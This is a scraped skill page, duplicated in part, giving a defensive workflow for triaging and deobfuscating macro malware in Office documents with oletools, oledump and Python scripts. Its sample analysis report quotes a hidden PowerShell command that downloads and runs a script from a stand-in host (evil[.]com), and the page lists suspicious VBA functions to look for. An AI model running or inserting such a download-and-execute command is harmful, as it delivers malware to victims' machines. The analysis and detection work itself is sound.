Analyzing Macro Malware in Office Documents

When to Use

A suspicious Office document (.doc, .docm, .xls, .xlsm, .ppt) has been flagged by email security
Investigating phishing campaigns that deliver weaponized Office documents
Extracting VBA macro code to identify the payload download URL and execution method
Analyzing obfuscated VBA code to understand the full attack chain
Determining if a document uses DDE, ActiveX, or remote template injection instead of macros

Do not use for analyzing non-macro Office threats (DDE, remote template injection); while this skill covers detection of these, specialized analysis may be needed.

Prerequisites

Python 3.8+ with oletools installed (pip install oletools)
oledump.py from Didier Stevens (https://blog.didierstevens.com/programs/oledump-py/)
Isolated analysis VM without Microsoft Office installed (prevents accidental execution)
XLMDeobfuscator for Excel 4.0 macro analysis (pip install xlmdeobfuscator)
LibreOffice for safe document rendering (does not execute VBA macros by default)

Workflow

Step 1: Initial Document Triage

Determine if the document contains macros or other active content:

# Quick triage with olevba
olevba suspect.docm

# Check for OLE streams and macros
oleid suspect.docm

# Output indicators:
# VBA Macros:        True/False
# XLM Macros:        True/False
# External Relationships: True/False (remote template)
# ObjectPool:        True/False (embedded objects)
# Flash:             True/False (SWF objects)

# Comprehensive OLE analysis
oledump.py suspect.docm

# List all OLE streams with macro indicators
# Streams marked with 'M' contain VBA macros
# Streams marked with 'm' contain macro attributes

Step 2: Extract and Analyze VBA Code

Pull out the complete VBA macro source:

# Extract VBA with full deobfuscation
olevba --decode --deobf suspect.docm

# Extract just the VBA source code
olevba --code suspect.docm > extracted_vba.txt

# Detailed extraction with oledump
oledump.py -s 8 -v suspect.docm  # Stream 8 (adjust based on stream listing)

# Extract all macro streams
oledump.py -p plugin_vba_dco suspect.docm

Key VBA Elements to Identify:
━━━━━━━━━━━━━━━━━━━━━━━━━━━
Auto-Execution Triggers:
  - Auto_Open / AutoOpen (Word)
  - Auto_Close / AutoClose
  - Document_Open / Document_Close
  - Workbook_Open (Excel)
  - AutoExec

Suspicious Functions:
  - Shell() / Shell.Application
  - WScript.Shell.Run / Exec
  - CreateObject("WScript.Shell")
  - PowerShell execution
  - URLDownloadToFile
  - MSXML2.XMLHTTP (HTTP requests)
  - ADODB.Stream (file writing)
  - Environ() (environment variables)
  - CallByName (indirect method calls)

Step 3: Deobfuscate VBA Code

Remove obfuscation layers to reveal the payload:

# VBA deobfuscation techniques
import re

def deobfuscate_vba(code):
    # 1. Resolve Chr() calls: Chr(104) & Chr(116) -> "ht"
    def resolve_chr(match):
        try:
            return chr(int(match.group(1)))
        except:
            return match.group(0)
    code = re.sub(r'Chr\$?\((\d+)\)', resolve_chr, code)

    # 2. Remove string concatenation: "htt" & "p://" -> "http://"
    code = re.sub(r'"\s*&\s*"', '', code)

    # 3. Resolve ChrW calls: ChrW(104)
    code = re.sub(r'ChrW\$?\((\d+)\)', resolve_chr, code)

    # 4. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe"
    def resolve_reverse(match):
        return '"' + match.group(1)[::-1] + '"'
    code = re.sub(r'StrReverse\("([^"]+)"\)', resolve_reverse, code)

    # 5. Remove Mid$/Left$/Right$ obfuscation (complex, mark for manual review)

    # 6. Resolve Replace(): Replace("Powxershxell", "x", "")
    def resolve_replace(match):
        original = match.group(1)
        find = match.group(2)
        replace_with = match.group(3)
        return '"' + original.replace(find, replace_with) + '"'
    code = re.sub(r'Replace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)', resolve_replace, code)

    return code

with open("extracted_vba.txt") as f:
    vba_code = f.read()

deobfuscated = deobfuscate_vba(vba_code)
print(deobfuscated)

Step 4: Analyze Excel 4.0 (XLM) Macros

Handle legacy Excel macros that bypass VBA detection:

# Detect XLM macros
olevba --xlm suspect.xlsm

# Deobfuscate XLM macros
xlmdeobfuscator -f suspect.xlsm

# Manual XLM analysis with oledump
oledump.py suspect.xlsm -p plugin_biff.py

# XLM (Excel 4.0) macro functions to watch for:
# EXEC()       - Execute shell command
# CALL()       - Call DLL function
# REGISTER()   - Register DLL function
# URLDownloadToFileA - Download file
# ALERT()      - Display message (social engineering)
# HALT()       - Stop execution
# GOTO()       - Control flow
# IF()         - Conditional execution

Step 5: Check for Non-Macro Attack Vectors

Examine the document for DDE, remote templates, and embedded objects:

# Check for DDE (Dynamic Data Exchange)
python3 -c "
import zipfile
import xml.etree.ElementTree as ET
import re

z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
    if name.endswith('.xml') or name.endswith('.rels'):
        content = z.read(name).decode('utf-8', errors='ignore')
        # DDE field codes
        if 'DDEAUTO' in content or 'DDE ' in content:
            print(f'[!] DDE found in {name}')
            dde_match = re.findall(r'DDEAUTO[^\"]*\"([^\"]+)\"', content)
            for m in dde_match:
                print(f'    Command: {m}')
        # Remote template
        if 'attachedTemplate' in content or 'Target=' in content:
            urls = re.findall(r'Target=\"(https?://[^\"]+)\"', content)
            for url in urls:
                print(f'[!] Remote template URL: {url}')
"

# Check for embedded OLE objects
oledump.py -p plugin_msg.py suspect.docm

# Check relationships for external references
python3 -c "
import zipfile
z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
    if '.rels' in name:
        content = z.read(name).decode('utf-8', errors='ignore')
        if 'http' in content.lower() or 'ftp' in content.lower():
            print(f'External reference in {name}:')
            import re
            urls = re.findall(r'Target=\"([^\"]+)\"', content)
            for url in urls:
                print(f'  {url}')
"

Step 6: Generate Analysis Report

Document the complete macro malware analysis:

Report should include:
- Document metadata (author, creation date, modification date)
- Macro presence and type (VBA, XLM, DDE, remote template)
- Auto-execution trigger identified
- Deobfuscated VBA source code (key functions)
- Download URL(s) for second-stage payloads
- Execution method (Shell, WScript, PowerShell, COM object)
- Social engineering lure description
- Extracted IOCs (URLs, domains, IPs, file hashes)
- YARA rule for the specific document pattern

Key Concepts

| Term | Definition | |------|------------| | VBA Macro | Visual Basic for Applications code embedded in Office documents that can interact with the OS, download files, and execute commands | | Auto_Open | VBA event procedure that executes automatically when a Word document is opened, the primary trigger for macro malware | | OLE (Object Linking and Embedding) | Microsoft compound document format; Office documents are OLE containers with streams that can contain macros and objects | | DDE (Dynamic Data Exchange) | Legacy Windows IPC mechanism abused in documents to execute commands without macros; triggered by field code updates | | Remote Template Injection | Attack loading a macro-enabled template from a remote URL when the document opens, bypassing initial macro detection | | XLM Macros (Excel 4.0) | Legacy Excel macro language predating VBA; stored in hidden sheets and often missed by traditional VBA analysis tools | | Protected View | Office sandbox that prevents macro execution until the user clicks "Enable Content"; social engineering targets this barrier |

Tools & Systems

oletools (olevba): Python toolkit for analyzing OLE files, extracting VBA macros, and detecting suspicious keywords and IOCs
oledump.py: Didier Stevens' tool for analyzing OLE streams with plugin support for VBA decompression and extraction
XLMDeobfuscator: Tool specifically designed for deobfuscating Excel 4.0 (XLM) macro formulas
ViperMonkey: VBA emulation engine that executes VBA macros in a sandboxed environment to observe behavior
YARA: Pattern matching for document-based malware detection using VBA string patterns and OLE structure indicators

Common Scenarios

Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros

Context: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document.

Approach:

Run oleid to confirm VBA macros are present and identify auto-execution triggers
Extract VBA code with olevba --decode --deobf for initial deobfuscation
Identify the auto-execution entry point (Auto_Open or Document_Open)
Trace the execution flow from the entry point through helper functions
Deobfuscate string concatenation and Chr() encoding to reveal the download URL
Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell)
Extract all IOCs and create YARA rules for the specific obfuscation pattern

Pitfalls:

Opening the document in Microsoft Office for "quick analysis" instead of using command-line tools
Missing VBA code stored in UserForms (GUI elements can contain code in their event handlers)
Ignoring document metadata that may contain attacker fingerprints (author name, template name)
Not checking for both VBA and XLM macros in the same document (some malware uses both)

Output Format

OFFICE MACRO MALWARE ANALYSIS
================================
Document:         invoice_q3_2025.docm
SHA-256:          e3b0c44298fc1c149afbf4c8996fb924...
File Type:        Microsoft Word Document (OOXML with macros)
Author:           Administrator
Creation Date:    2025-09-10 14:23:00

MACRO ANALYSIS
Type:             VBA Macro
Trigger:          AutoOpen()
Streams:          3 VBA streams (ThisDocument, Module1, Module2)

DEOBFUSCATED EXECUTION CHAIN
1. AutoOpen() -> Calls Module1.RunPayload()
2. RunPayload() builds command string via Chr() concatenation
3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1')

SOCIAL ENGINEERING LURE
- Document displays fake "Protected Document" image
- Instructs user to "Enable Content" to view the document
- Content is blurred/hidden until macros execute

EXTRACTED IOCs
Download URL:     hxxp://evil[.]com/payload.ps1
C2 Domain:        evil[.]com
IP Address:       185.220.101[.]42
User-Agent:       PowerShell (default WebClient)

MITRE ATT&CK
T1566.001  Phishing: Spearphishing Attachment
T1204.002  User Execution: Malicious File
T1059.001  Command and Scripting Interpreter: PowerShell
T1059.005  Command and Scripting Interpreter: Visual Basic

Analyzing Macro Malware in Office Documents

When to Use

A suspicious Office document (.doc, .docm, .xls, .xlsm, .ppt) has been flagged by email security
Investigating phishing campaigns that deliver weaponized Office documents
Extracting VBA macro code to identify the payload download URL and execution method
Analyzing obfuscated VBA code to understand the full attack chain
Determining if a document uses DDE, ActiveX, or remote template injection instead of macros

Do not use for analyzing non-macro Office threats (DDE, remote template injection); while this skill covers detection of these, specialized analysis may be needed.

Prerequisites

Python 3.8+ with oletools installed (pip install oletools)
oledump.py from Didier Stevens (https://blog.didierstevens.com/programs/oledump-py/)
Isolated analysis VM without Microsoft Office installed (prevents accidental execution)
XLMDeobfuscator for Excel 4.0 macro analysis (pip install xlmdeobfuscator)
LibreOffice for safe document rendering (does not execute VBA macros by default)

Workflow

Step 1: Initial Document Triage

Determine if the document contains macros or other active content:

# Quick triage with olevba
olevba suspect.docm

# Check for OLE streams and macros
oleid suspect.docm

# Output indicators:
# VBA Macros:        True/False
# XLM Macros:        True/False
# External Relationships: True/False (remote template)
# ObjectPool:        True/False (embedded objects)
# Flash:             True/False (SWF objects)

# Comprehensive OLE analysis
oledump.py suspect.docm

# List all OLE streams with macro indicators
# Streams marked with 'M' contain VBA macros
# Streams marked with 'm' contain macro attributes

Step 2: Extract and Analyze VBA Code

Pull out the complete VBA macro source:

# Extract VBA with full deobfuscation
olevba --decode --deobf suspect.docm

# Extract just the VBA source code
olevba --code suspect.docm > extracted_vba.txt

# Detailed extraction with oledump
oledump.py -s 8 -v suspect.docm  # Stream 8 (adjust based on stream listing)

# Extract all macro streams
oledump.py -p plugin_vba_dco suspect.docm

Key VBA Elements to Identify:
━━━━━━━━━━━━━━━━━━━━━━━━━━━
Auto-Execution Triggers:
  - Auto_Open / AutoOpen (Word)
  - Auto_Close / AutoClose
  - Document_Open / Document_Close
  - Workbook_Open (Excel)
  - AutoExec

Suspicious Functions:
  - Shell() / Shell.Application
  - WScript.Shell.Run / Exec
  - CreateObject("WScript.Shell")
  - PowerShell execution
  - URLDownloadToFile
  - MSXML2.XMLHTTP (HTTP requests)
  - ADODB.Stream (file writing)
  - Environ() (environment variables)
  - CallByName (indirect method calls)

Step 3: Deobfuscate VBA Code

Remove obfuscation layers to reveal the payload:

# VBA deobfuscation techniques
import re

def deobfuscate_vba(code):
    # 1. Resolve Chr() calls: Chr(104) & Chr(116) -> "ht"
    def resolve_chr(match):
        try:
            return chr(int(match.group(1)))
        except:
            return match.group(0)
    code = re.sub(r'Chr\$?\((\d+)\)', resolve_chr, code)

    # 2. Remove string concatenation: "htt" & "p://" -> "http://"
    code = re.sub(r'"\s*&\s*"', '', code)

    # 3. Resolve ChrW calls: ChrW(104)
    code = re.sub(r'ChrW\$?\((\d+)\)', resolve_chr, code)

    # 4. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe"
    def resolve_reverse(match):
        return '"' + match.group(1)[::-1] + '"'
    code = re.sub(r'StrReverse\("([^"]+)"\)', resolve_reverse, code)

    # 5. Remove Mid$/Left$/Right$ obfuscation (complex, mark for manual review)

    # 6. Resolve Replace(): Replace("Powxershxell", "x", "")
    def resolve_replace(match):
        original = match.group(1)
        find = match.group(2)
        replace_with = match.group(3)
        return '"' + original.replace(find, replace_with) + '"'
    code = re.sub(r'Replace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)', resolve_replace, code)

    return code

with open("extracted_vba.txt") as f:
    vba_code = f.read()

deobfuscated = deobfuscate_vba(vba_code)
print(deobfuscated)

Step 4: Analyze Excel 4.0 (XLM) Macros

Handle legacy Excel macros that bypass VBA detection:

# Detect XLM macros
olevba --xlm suspect.xlsm

# Deobfuscate XLM macros
xlmdeobfuscator -f suspect.xlsm

# Manual XLM analysis with oledump
oledump.py suspect.xlsm -p plugin_biff.py

# XLM (Excel 4.0) macro functions to watch for:
# EXEC()       - Execute shell command
# CALL()       - Call DLL function
# REGISTER()   - Register DLL function
# URLDownloadToFileA - Download file
# ALERT()      - Display message (social engineering)
# HALT()       - Stop execution
# GOTO()       - Control flow
# IF()         - Conditional execution

Step 5: Check for Non-Macro Attack Vectors

Examine the document for DDE, remote templates, and embedded objects:

# Check for DDE (Dynamic Data Exchange)
python3 -c "
import zipfile
import xml.etree.ElementTree as ET
import re

z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
    if name.endswith('.xml') or name.endswith('.rels'):
        content = z.read(name).decode('utf-8', errors='ignore')
        # DDE field codes
        if 'DDEAUTO' in content or 'DDE ' in content:
            print(f'[!] DDE found in {name}')
            dde_match = re.findall(r'DDEAUTO[^\"]*\"([^\"]+)\"', content)
            for m in dde_match:
                print(f'    Command: {m}')
        # Remote template
        if 'attachedTemplate' in content or 'Target=' in content:
            urls = re.findall(r'Target=\"(https?://[^\"]+)\"', content)
            for url in urls:
                print(f'[!] Remote template URL: {url}')
"

# Check for embedded OLE objects
oledump.py -p plugin_msg.py suspect.docm

# Check relationships for external references
python3 -c "
import zipfile
z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
    if '.rels' in name:
        content = z.read(name).decode('utf-8', errors='ignore')
        if 'http' in content.lower() or 'ftp' in content.lower():
            print(f'External reference in {name}:')
            import re
            urls = re.findall(r'Target=\"([^\"]+)\"', content)
            for url in urls:
                print(f'  {url}')
"

Step 6: Generate Analysis Report

Document the complete macro malware analysis:

Report should include:
- Document metadata (author, creation date, modification date)
- Macro presence and type (VBA, XLM, DDE, remote template)
- Auto-execution trigger identified
- Deobfuscated VBA source code (key functions)
- Download URL(s) for second-stage payloads
- Execution method (Shell, WScript, PowerShell, COM object)
- Social engineering lure description
- Extracted IOCs (URLs, domains, IPs, file hashes)
- YARA rule for the specific document pattern

Key Concepts

Tools & Systems

oletools (olevba): Python toolkit for analyzing OLE files, extracting VBA macros, and detecting suspicious keywords and IOCs
oledump.py: Didier Stevens' tool for analyzing OLE streams with plugin support for VBA decompression and extraction
XLMDeobfuscator: Tool specifically designed for deobfuscating Excel 4.0 (XLM) macro formulas
ViperMonkey: VBA emulation engine that executes VBA macros in a sandboxed environment to observe behavior
YARA: Pattern matching for document-based malware detection using VBA string patterns and OLE structure indicators

Common Scenarios

Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros

Context: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document.

Approach:

Run oleid to confirm VBA macros are present and identify auto-execution triggers
Extract VBA code with olevba --decode --deobf for initial deobfuscation
Identify the auto-execution entry point (Auto_Open or Document_Open)
Trace the execution flow from the entry point through helper functions
Deobfuscate string concatenation and Chr() encoding to reveal the download URL
Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell)
Extract all IOCs and create YARA rules for the specific obfuscation pattern

Pitfalls:

Opening the document in Microsoft Office for "quick analysis" instead of using command-line tools
Missing VBA code stored in UserForms (GUI elements can contain code in their event handlers)
Ignoring document metadata that may contain attacker fingerprints (author name, template name)
Not checking for both VBA and XLM macros in the same document (some malware uses both)

Output Format

OFFICE MACRO MALWARE ANALYSIS
================================
Document:         invoice_q3_2025.docm
SHA-256:          e3b0c44298fc1c149afbf4c8996fb924...
File Type:        Microsoft Word Document (OOXML with macros)
Author:           Administrator
Creation Date:    2025-09-10 14:23:00

MACRO ANALYSIS
Type:             VBA Macro
Trigger:          AutoOpen()
Streams:          3 VBA streams (ThisDocument, Module1, Module2)

DEOBFUSCATED EXECUTION CHAIN
1. AutoOpen() -> Calls Module1.RunPayload()
2. RunPayload() builds command string via Chr() concatenation
3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1')

SOCIAL ENGINEERING LURE
- Document displays fake "Protected Document" image
- Instructs user to "Enable Content" to view the document
- Content is blurred/hidden until macros execute

EXTRACTED IOCs
Download URL:     hxxp://evil[.]com/payload.ps1
C2 Domain:        evil[.]com
IP Address:       185.220.101[.]42
User-Agent:       PowerShell (default WebClient)

MITRE ATT&CK
T1566.001  Phishing: Spearphishing Attachment
T1204.002  User Execution: Malicious File
T1059.001  Command and Scripting Interpreter: PowerShell
T1059.005  Command and Scripting Interpreter: Visual Basic

Adoption

pinkpixel-dev/analyzing-macro-malware-in-office-documents

$ install --global

Security Scan Results

SKILL.md

Analyzing Macro Malware in Office Documents

When to Use

Prerequisites

Workflow

Step 1: Initial Document Triage

Step 2: Extract and Analyze VBA Code

Step 3: Deobfuscate VBA Code

Step 4: Analyze Excel 4.0 (XLM) Macros

Step 5: Check for Non-Macro Attack Vectors

Step 6: Generate Analysis Report

Key Concepts

Tools & Systems

Common Scenarios

Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros

Output Format

Related Skills

pinkpixel-dev/building-threat-hunt-hypothesis-framework

pinkpixel-dev/building-threat-feed-aggregation-with-misp

pinkpixel-dev/building-threat-actor-profile-from-osint

pinkpixel-dev/building-soc-playbook-for-ransomware

pinkpixel-dev/analyzing-macro-malware-in-office-documents

$ install --global

Security Scan Results

SKILL.md

Analyzing Macro Malware in Office Documents

When to Use

Prerequisites

Workflow

Step 1: Initial Document Triage

Step 2: Extract and Analyze VBA Code

Step 3: Deobfuscate VBA Code

Step 4: Analyze Excel 4.0 (XLM) Macros

Step 5: Check for Non-Macro Attack Vectors

Step 6: Generate Analysis Report

Key Concepts

Tools & Systems

Common Scenarios

Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros

Output Format

Related Skills

pinkpixel-dev/building-threat-hunt-hypothesis-framework

pinkpixel-dev/building-threat-feed-aggregation-with-misp

pinkpixel-dev/building-threat-actor-profile-from-osint

pinkpixel-dev/building-soc-playbook-for-ransomware